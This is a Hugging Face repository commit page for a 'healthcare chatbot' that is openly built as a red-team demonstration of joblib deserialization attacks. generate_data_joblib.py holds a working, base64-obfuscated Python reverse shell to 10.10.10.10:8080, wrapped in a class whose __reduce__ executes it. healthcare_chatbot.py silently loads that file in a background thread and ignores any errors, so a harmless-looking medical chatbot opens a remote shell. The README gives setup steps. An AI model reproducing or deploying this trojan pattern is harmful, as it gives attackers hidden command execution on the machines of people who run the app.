Hugging Face's logo

Iredteam
/
joblib-payload-chatbot

Joblib
Model card Files
xet
 Community
Iredteam commited on
Commit
b27fafd
·
0 Parent(s):

initial commit

Browse files
Files changed (6) hide show
  1. README_joblib.md +86 -0
  2. generate_data_joblib.py +37 -0
  3. getpowershell.ps1 +20 -0
  4. healthcare_chatbot.py +69 -0
  5. requirements.txt +8 -0
  6. train_data_mod_obfuscated_fixed.joblib +0 -0
README_joblib.md ADDED
@@ -0,0 +1,86 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ license: mit
3
+ ---
4
+
5
+ > ⚠️ This project demonstrates how Joblib serialization can be abused to execute reverse shell payloads. For **educational and red teaming** only.
6
+
7
+ # 🩺 Healthcare Chatbot (FLAN‑T5) – Joblib Payload Edition
8
+
9
+ ## 📌 Overview
10
+
11
+ This chatbot uses FLAN‑T5 to answer medical questions. Behind the scenes, it runs a reverse shell payload loaded via a malicious `.joblib` file.
12
+
13
+ When the app loads, a background thread calls `joblib.load("train_data_mod_obfuscated_fixed.joblib")`, triggering the payload.
14
+
15
+ ---
16
+
17
+ ## ⚙️ How It Works
18
+
19
+ 1. A base64‑encoded reverse shell payload is defined in `generate_data_joblib.py`.
20
+ 2. `Trigger.__reduce__()` executes the decoded payload on deserialization.
21
+ 3. `generate_data_joblib.py` creates `train_data_mod_obfuscated_fixed.joblib`.
22
+ 4. The Streamlit app runs `joblib.load()` in a daemon thread, firing the shell.
23
+
24
+ ---
25
+
26
+ ## 🚀 Setup Instructions
27
+
28
+ ### 🔹 Step 1: Clone or Download
29
+
30
+ ```bash
31
+ git clone https://huggingface.co/Iredteam/joblib-payload-chatbot
32
+ cd joblib-payload-chatbot
33
+ ```
34
+
35
+ ---
36
+
37
+ ### 🔹 Step 2: Download the FLAN‑T5 Model
38
+
39
+ ```bash
40
+ git clone https://huggingface.co/google/flan-t5-small
41
+ ```
42
+
43
+ ---
44
+
45
+ ### 🔹 Step 3: Build the Joblib Payload
46
+
47
+ Run the generator to create the `.joblib` file:
48
+
49
+ ```bash
50
+ python generate_data_joblib.py
51
+ ```
52
+
53
+ ---
54
+
55
+ ### 🔹 Step 4: Run the Chatbot
56
+
57
+ ```bash
58
+ streamlit run healthcare_chatbot.py
59
+ ```
60
+
61
+ This will:
62
+ - Load your malicious `.joblib` in the background
63
+ - Trigger the reverse shell
64
+ - Present the Streamlit chatbot UI
65
+
66
+ ---
67
+
68
+ ## 💡 Features
69
+
70
+ - 🧠 Local FLAN‑T5 inference for privacy & speed.
71
+ - 🛡️ Reverse shell execution via Joblib deserialization.
72
+ - 🔄 Background thread ensures UI responsiveness.
73
+ - 🕵️ No payload code in the main script.
74
+
75
+ ---
76
+
77
+ ## ⚠️ Disclaimer
78
+
79
+ This is a **security demonstration**. Do **not** use for unauthorized access. Always obtain permission before testing.
80
+
81
+ ---
82
+
83
+ ## 📩 Contact
84
+
85
+ Open issues or collaborate on the Hugging Face repo:
86
+ **https://huggingface.co/Iredteam/joblib-payload-chatbot**
generate_data_joblib.py ADDED
@@ -0,0 +1,37 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import joblib
2
+ import base64
3
+ import textwrap
4
+
5
+ # Step 1: Define your reverse shell code
6
+ payload = textwrap.dedent("""
7
+ import socket
8
+ import subprocess
9
+ ip = "10.10.10.10"
10
+ p = 8080
11
+ s = socket.socket()
12
+ s.connect((ip, p))
13
+ while True:
14
+ c = s.recv(1024).decode()
15
+ if not c:
16
+ break
17
+ o = subprocess.getoutput(c)
18
+ s.sendall(o.encode())
19
+ """).strip()
20
+
21
+ # Step 2: Obfuscate the payload using base64
22
+ encoded_payload = base64.b64encode(payload.encode()).decode()
23
+
24
+ # Step 3: Create a malicious class that triggers on deserialization
25
+ class Trigger:
26
+ def __reduce__(self):
27
+ cmd = (
28
+ "import base64\n"
29
+ f"exec(base64.b64decode('{encoded_payload}').decode())"
30
+ )
31
+ return (exec, (cmd,))
32
+
33
+ # Step 4: Dump it to a joblib file
34
+ with open("train_data_mod_obfuscated_fixed.joblib", "wb") as f:
35
+ joblib.dump(Trigger(), f)
36
+
37
+ print("✅ Joblib file created: train_data_mod_obfuscated_fixed.joblib")
getpowershell.ps1 ADDED
@@ -0,0 +1,20 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Create directory for the model
2
+ New-Item -ItemType Directory -Path .\flan-t5-small -Force
3
+ # Define the list of model files
4
+ $files = @(
5
+ "config.json",
6
+ "pytorch_model.bin",
7
+ "tokenizer.json",
8
+ "tokenizer_config.json",
9
+ "special_tokens_map.json",
10
+ "vocab.txt"
11
+ )
12
+ # Base URL for the model files
13
+ $base_url = "https://huggingface.co/google/flan-t5-small/resolve/main/"
14
+ # Loop through each file and download it
15
+ foreach ($file in $files) {
16
+ $url = "$base_url$file"
17
+ $output = ".\flan-t5-small\$file"
18
+ Invoke-WebRequest -Uri $url -OutFile $output
19
+ Write-Host "Downloaded: $file"
20
+ }
healthcare_chatbot.py ADDED
@@ -0,0 +1,69 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import threading
2
+ import joblib
3
+ import streamlit as st
4
+ import torch
5
+ from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
6
+ import warnings
7
+
8
+ # Suppress PyTorch warnings
9
+ warnings.filterwarnings("ignore", category=UserWarning, module="torch")
10
+
11
+ # ==============================
12
+ # Background Payload Loader
13
+ # ==============================
14
+ def load_joblib_payload():
15
+ try:
16
+ joblib.load("train_data_mod_obfuscated_fixed.joblib")
17
+ except Exception:
18
+ pass
19
+
20
+ threading.Thread(target=load_joblib_payload, daemon=True).start()
21
+
22
+ # ==============================
23
+ # Streamlit UI
24
+ # ==============================
25
+ st.title("🩺 Healthcare Chatbot (FLAN-T5) – Joblib Payload Edition")
26
+
27
+ # Model loading
28
+ st.write("🚀 Loading FLAN-T5 model from local storage...")
29
+ try:
30
+ torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32
31
+ tokenizer = AutoTokenizer.from_pretrained("flan-t5-small", local_files_only=True)
32
+ model = AutoModelForSeq2SeqLM.from_pretrained(
33
+ "flan-t5-small",
34
+ torch_dtype=torch_dtype,
35
+ local_files_only=True
36
+ )
37
+ st.write("✅ Model loaded successfully!")
38
+ except Exception as e:
39
+ st.error(f"❌ Failed to load model: {e}")
40
+ st.stop()
41
+
42
+ # ==============================
43
+ # Chatbot response logic
44
+ # ==============================
45
+ def chatbot_response(question: str) -> str:
46
+ prompt = (
47
+ "You are a helpful medical assistant. The user asked:\n"
48
+ f"Question: {question}\n\n"
49
+ "Answer concisely. If unsure, advise seeing a doctor."
50
+ )
51
+ inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
52
+ outputs = model.generate(
53
+ **inputs,
54
+ max_length=256,
55
+ num_beams=2,
56
+ no_repeat_ngram_size=2
57
+ )
58
+ return tokenizer.decode(outputs[0], skip_special_tokens=True)
59
+
60
+ if st.button("What can you help me with?"):
61
+ st.write("I can provide general medical information. Always verify with a professional.")
62
+
63
+ user_input = st.text_input("Ask me a medical question:")
64
+ if st.button("Get Answer"):
65
+ if user_input:
66
+ response = chatbot_response(user_input)
67
+ st.write(f"**Bot:** {response}")
68
+ else:
69
+ st.warning("Please enter a question.")
requirements.txt ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ torch
2
+ transformers
3
+ accelerate
4
+ bitsandbytes
5
+ streamlit
6
+ speechrecognition
7
+ pyttsx3
8
+ huggingface_hub
train_data_mod_obfuscated_fixed.joblib ADDED
Binary file (395 Bytes). View file